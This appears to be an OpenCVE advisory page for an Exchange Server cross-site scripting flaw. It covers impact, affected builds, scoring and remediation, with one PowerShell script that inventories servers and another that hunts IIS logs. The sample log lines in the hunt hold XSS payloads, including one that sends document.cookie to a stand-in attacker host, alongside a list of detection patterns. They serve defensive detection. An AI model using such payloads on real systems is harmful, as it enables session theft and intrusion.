Description
Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Exchange Server allows an unauthorized attacker to perform spoofing over a network.
Published: 2026-06-09
Score: 8.1 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

Improper neutralization of user-supplied input during web page generation in Microsoft Exchange Server results in a cross-site scripting flaw (CWE-79). An attacker can get script of their choosing to execute in a victim's browser within the origin of the Exchange web interface, where it can rewrite what the page displays, present forged prompts or content under the server's own identity, and act within the victim's session. The vendor description states only that an unauthorized attacker can perform spoofing over a network; it does not name the affected page or component. The CVSS vector nonetheless rates confidentiality and integrity impact as high (C:H/I:H), so the practical consequences of a successful attack go beyond cosmetic spoofing to phishing, exposure of what the victim sees in the web interface, and actions taken in the victim's session, all of which undermine trust in the mail front end.

Affected Systems

Microsoft lists Exchange Server 2016 at Cumulative Update 23, Exchange Server 2019 at Cumulative Updates 14 and 15, and Exchange Server Subscription Edition at its RTM release as affected; the corresponding CPE entries appear in the History section below. Exchange security updates are built per cumulative update, so the installed CU level, not only the major version, decides whether a server is in scope and which update will apply to it.
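The following PowerShell check is an added example for this page, not OpenCVE's or Microsoft's code. Run from the Exchange Management Shell, it lists every Exchange server in the organization, maps each server's AdminDisplayVersion to the CU families named in this CVE's CPE entries, and records the ExSetup.exe file version, which is where Exchange Security Updates become visible. The build prefixes in $affectedFamilies are assumptions taken from memory of Microsoft's published Exchange build-number table and must be verified there before the report is acted on; the remoting via Invoke-Command and the CSV file name are choices of this example.

```powershell
# Added example for this CVE page, not OpenCVE's or Microsoft's code. Run from the Exchange
# Management Shell with rights to Get-ExchangeServer and to remote into each server.
# The CU build prefixes below are ASSUMPTIONS: confirm them against Microsoft's published
# Exchange Server build-number table before acting on the report.
$affectedFamilies = @{
    '15.1.2507' = 'Exchange Server 2016 CU23'
    '15.2.1544' = 'Exchange Server 2019 CU14'
    '15.2.1748' = 'Exchange Server 2019 CU15'
    '15.2.2562' = 'Exchange Server Subscription Edition RTM'
}

function Get-ExchangeCuFamily {
    # AdminDisplayVersion identifies the installed CU (Major.Minor.Build). It does not change
    # when a Security Update is installed, so it answers "which CU?" but not "which SU?".
    # Works on the ServerVersion object and on its string form "Version 15.1 (Build 2507.6)".
    param([Parameter(Mandatory)] $AdminDisplayVersion)
    if ("$AdminDisplayVersion" -match 'Version\s+(\d+)\.(\d+)\s+\(Build\s+(\d+)\.(\d+)\)') {
        return '{0}.{1}.{2}' -f $Matches[1], $Matches[2], $Matches[3]
    }
    return "$AdminDisplayVersion"
}

function Get-ExSetupFileVersion {
    # Security Updates raise the file version of ExSetup.exe, so this is the number to compare
    # with the SU build Microsoft publishes for CVE-2026-47631. Requires PowerShell remoting.
    param([Parameter(Mandatory)] [string] $ComputerName)
    try {
        Invoke-Command -ComputerName $ComputerName -ErrorAction Stop -ScriptBlock {
            (Get-Item (Join-Path $env:ExchangeInstallPath 'bin\ExSetup.exe')).VersionInfo.FileVersion
        }
    } catch {
        "unavailable ($($_.Exception.Message))"
    }
}

$report = foreach ($srv in Get-ExchangeServer) {
    $family   = Get-ExchangeCuFamily -AdminDisplayVersion $srv.AdminDisplayVersion
    $affected = $affectedFamilies.ContainsKey($family)
    $cuName   = if ($affected) { $affectedFamilies[$family] } else { 'not in the CVE-2026-47631 CPE list' }
    [pscustomobject]@{
        Server         = $srv.Name
        AdminDisplay   = "$($srv.AdminDisplayVersion)"
        CuFamily       = $family
        CuName         = $cuName
        AffectedByCve  = $affected
        ExSetupVersion = Get-ExSetupFileVersion -ComputerName $srv.Fqdn
    }
}

$report | Sort-Object -Property AffectedByCve -Descending | Format-Table -AutoSize
# Keep the affected subset for the change ticket; compare ExSetupVersion with the SU build once it is published.
$report | Where-Object { $_.AffectedByCve } | Export-Csv -NoTypeInformation -Path .\CVE-2026-47631-exposure.csv
```

The two-step version check matters because Get-ExchangeServer keeps reporting the CU build after a Security Update is installed; only the ExSetup.exe file version moves. Microsoft's own HealthChecker script from the CSS-Exchange project reports both numbers as well and is the better choice for a full health review; the snippet above is limited to the single question this CVE raises.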

Risk and Exploitability

The CVSS 3.1 base score of 8.1 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N) is High. The EPSS score is below 1%, the vulnerability is not in CISA's KEV catalog, and the SSVC record in the History section gives Exploitation: none, so there is no public evidence of exploitation at the time of writing; the temporal part of the vector (E:U/RL:O/RC:C) likewise records unproven exploit code and an official vendor fix. PR:N means the attacker needs no Exchange credentials, but UI:R means a victim must take an action, typically opening an attacker-crafted link or content that the vulnerable page reflects into its output, which is the usual shape of a cross-site scripting bug; the attack therefore runs in the user's browser session with the Exchange web interface rather than against the server process. Given the high confidentiality and integrity impact, the absence of an authentication requirement, and how often Outlook on the web is exposed to the Internet, the risk to user trust and mailbox data is significant until the update is applied.

Generated by OpenCVE AI on June 9, 2026 at 20:27 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Apply the Exchange Server Security Update (SU) that Microsoft publishes for this CVE to each affected build: Exchange 2016 CU23, Exchange 2019 CU14 and CU15, and the Subscription Edition RTM. These CU levels are the affected baselines, not the fix; being on CU23, CU14 or CU15 does not remediate anything. The temporal metric RL:O in the CVSS vector indicates that Microsoft rates an official fix as available, so check the Microsoft Security Update Guide entry for CVE-2026-47631 for the SU that matches each build even though this page lists no vendor remediation, and verify installation by the ExSetup.exe file version, since Get-ExchangeServer reports only the CU build.
  • Until the SU is installed, reduce the exposure of the Exchange web interfaces (Outlook on the web, ECP and the other IIS virtual directories) to the Internet where operations allow, for example by fronting them with a pre-authenticating reverse proxy or requiring VPN, and keep the Exchange Emergency Mitigation Service enabled so that any Microsoft-published interim mitigation is applied automatically. A cross-site scripting flaw in a web page is not affected by disabling legacy transport protocols, and an IP allow-list on its own does not stop an attack whose final step is a legitimate user opening a crafted link.
  • A web application firewall or reverse-proxy rule that blocks obvious script payloads (script tags, javascript: URLs, inline event handlers) in requests to the Exchange web paths is worthwhile defense in depth, but XSS filters are routinely bypassed with encoding variations, so treat the rule as a tripwire rather than a substitute for the update, and retain IIS logs for retrospective review.
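As an added example (not from the OpenCVE page or from Microsoft), the retrospective side of the WAF recommendation: a PowerShell hunt over IIS W3C logs on an Exchange server for script-injection attempts against its web paths. Microsoft has not named the vulnerable page, so the path filter is an assumption covering the usual Exchange virtual directories, and only payloads carried in the URL are visible because IIS does not log request bodies. The log lines are constructed for the example and use documentation IP ranges; the function name and indicator list are this example's own.

```powershell
# Added example for this CVE page, not OpenCVE's or Microsoft's code. Hunts IIS W3C logs for
# script-injection attempts against Exchange web paths. Microsoft has not named the vulnerable
# page, so the path filter is an ASSUMPTION covering the usual Exchange virtual directories, and
# only URL-carried payloads are visible: IIS does not log request bodies. Sample lines are constructed.

$sampleLog = @'
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2026-06-10 08:01:02 10.0.0.5 GET /owa/auth/logon.aspx url=https%3A%2F%2Fmail.example.com%2Fowa 443 - 203.0.113.10 Mozilla/5.0 200
2026-06-10 08:01:09 10.0.0.5 GET /owa/ id=%3Cscript%3Efetch('https://attacker.example/'%2Bdocument.cookie)%3C/script%3E 443 - 198.51.100.7 Mozilla/5.0 200
2026-06-10 08:02:15 10.0.0.5 GET /ecp/default.aspx ReturnObjectType=1&x=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E 443 - 198.51.100.7 curl/8.0 200
2026-06-10 08:03:44 10.0.0.5 POST /ews/exchange.asmx - 443 CONTOSO\alice 10.0.0.22 Microsoft+Office 200
2026-06-10 08:04:01 10.0.0.5 GET /owa/ path=/mail&view=javascript:alert(document.domain) 443 CONTOSO\bob 10.0.0.23 Mozilla/5.0 200
'@

$webPaths = '^/(owa|ecp|ews|autodiscover|mapi|rpc|oab)(/|$)'   # ASSUMPTION: Exchange web roots to inspect
$indicatorRegex = [regex]::new((@(
    '<\s*script',                          # script tag (after URL decoding)
    'javascript\s*:',                      # javascript: URL in an attribute value
    '<\s*(img|svg|iframe|object|embed)\b', # tags that carry event handlers or load code
    '\bon[a-z]+\s*=',                      # inline event handler: onerror=, onload=, ...
    'document\.(cookie|domain)'            # classic proof-of-concept targets
) -join '|'), 'IgnoreCase')

function Find-XssRequests {
    param([Parameter(Mandatory)] [string[]] $Lines)
    $fields = $null
    foreach ($line in $Lines) {
        # The #Fields: directive defines the column layout for the lines that follow it.
        if ($line -like '#Fields:*') { $fields = ($line -replace '^#Fields:\s*') -split ' '; continue }
        if ($line.StartsWith('#') -or [string]::IsNullOrWhiteSpace($line) -or -not $fields) { continue }
        $cols = $line -split ' '
        if ($cols.Count -ne $fields.Count) { continue }   # truncated or unexpected layout, skip it
        $rec = @{}
        for ($i = 0; $i -lt $fields.Count; $i++) { $rec[$fields[$i]] = $cols[$i] }
        if ($rec['cs-uri-stem'] -notmatch $webPaths) { continue }
        # IIS logs the request as received; decode twice so double-encoded payloads do not slip past.
        $raw     = $rec['cs-uri-stem'] + '?' + $rec['cs-uri-query']
        $decoded = [uri]::UnescapeDataString([uri]::UnescapeDataString($raw))
        $m = $indicatorRegex.Match($decoded)
        if ($m.Success) {
            [pscustomobject]@{
                Time      = '{0} {1}' -f $rec['date'], $rec['time']
                ClientIP  = $rec['c-ip']
                User      = $rec['cs-username']
                Method    = $rec['cs-method']
                Status    = $rec['sc-status']
                Indicator = $m.Value
                Request   = $decoded
            }
        }
    }
}

# Over the constructed sample:
Find-XssRequests -Lines ($sampleLog -split "`r?`n") | Format-Table -AutoSize
# On a real server, point it at the IIS logs of the Default Web Site, for example:
# Find-XssRequests -Lines (Get-Content C:\inetpub\logs\LogFiles\W3SVC1\*.log)
```

The indicator list is deliberately short and will produce some false positives on legitimate traffic; the value of the hunt is in the client IP, status code and decoded request it surfaces, which tell you whether a payload reached an authenticated user (a sc-status of 200 with a populated cs-username) or was only probing. A POST-delivered payload or one hidden in a fragment after # never appears in these logs, which is one reason the WAF rule and the vendor update are not interchangeable.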

Generated by OpenCVE AI on June 9, 2026 at 20:27 UTC.

Advisories

No advisories yet.

History

Mon, 15 Jun 2026 19:30:00 +0000

Type: First Time appeared
  Added: Microsoft exchange Server Subscription Edition
Type: CPEs
  Removed: cpe:2.3:a:microsoft:exchange_server:*:*:*:*:subscription:*:*:*
  Added: cpe:2.3:a:microsoft:exchange_server_subscription_edition:*:*:*:*:*:*:*:*
Type: Vendors & Products
  Added: Microsoft exchange Server Subscription Edition

Mon, 15 Jun 2026 14:30:00 +0000

Type: First Time appeared
  Added: Microsoft exchange Server
Type: CPEs
  Added: cpe:2.3:a:microsoft:exchange_server:*:*:*:*:subscription:*:*:*
         cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_23:*:*:*:*:*:*
         cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_14:*:*:*:*:*:*
         cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_15:*:*:*:*:*:*
Type: Vendors & Products
  Added: Microsoft exchange Server

Wed, 10 Jun 2026 15:30:00 +0000

Type: Metrics
  Added: ssvc {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Tue, 09 Jun 2026 23:15:00 +0000

Type: First Time appeared
  Added: Microsoft microsoft Exchange Server 2019 Cumulative Update 14
         Microsoft microsoft Exchange Server 2019 Cumulative Update 15
         Microsoft microsoft Exchange Server Subscription Edition Rtm
Type: Vendors & Products
  Added: Microsoft microsoft Exchange Server 2019 Cumulative Update 14
         Microsoft microsoft Exchange Server 2019 Cumulative Update 15
         Microsoft microsoft Exchange Server Subscription Edition Rtm

Tue, 09 Jun 2026 17:15:00 +0000

Type: Description
  Added: Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Exchange Server allows an unauthorized attacker to perform spoofing over a network.
Type: Title
  Added: Microsoft Exchange Server Spoofing Vulnerability
Type: First Time appeared
  Added: Microsoft
         Microsoft exchange Server 2016
         Microsoft exchange Server 2019
         Microsoft exchange Server Se
Type: Weaknesses
  Added: CWE-79
Type: CPEs
  Added: cpe:2.3:a:microsoft:exchange_server_2016:*:cumulative_update_23:*:*:*:*:*:*
         cpe:2.3:a:microsoft:exchange_server_2019:*:cumulative_update_14:*:*:*:*:*:*
         cpe:2.3:a:microsoft:exchange_server_2019:*:cumulative_update_15:*:*:*:*:*:*
         cpe:2.3:a:microsoft:exchange_server_se:*:RTM:*:*:*:*:*:*
Type: Vendors & Products
  Added: Microsoft
         Microsoft exchange Server 2016
         Microsoft exchange Server 2019
         Microsoft exchange Server Se
Type: References
Type: Metrics
  Added: cvssV3_1 {'score': 8.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N/E:U/RL:O/RC:C'}


Subscriptions

Microsoft, Exchange Server, Exchange Server 2016, Exchange Server 2019, Exchange Server Se, Exchange Server Subscription Edition, Microsoft Exchange Server 2019 Cumulative Update 14, Microsoft Exchange Server 2019 Cumulative Update 15, Microsoft Exchange Server Subscription Edition Rtm
MITRE

Status: PUBLISHED

Assigner: microsoft

Published:

Updated: 2026-06-26T19:41:09.658Z

Reserved: 2026-05-19T20:12:27.069Z

Link: CVE-2026-47631

Vulnrichment

Updated: 2026-06-10T14:24:23.722Z

NVD

Status : Analyzed

Published: 2026-06-09T17:17:35.173

Modified: 2026-06-15T19:20:08.503

Link: CVE-2026-47631

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-06-09T23:00:13Z

Weaknesses
  • CWE-79

    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')